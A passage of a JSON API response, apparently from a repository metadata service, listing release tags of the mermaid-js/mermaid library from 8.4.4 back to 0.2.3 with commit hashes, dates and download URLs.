/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url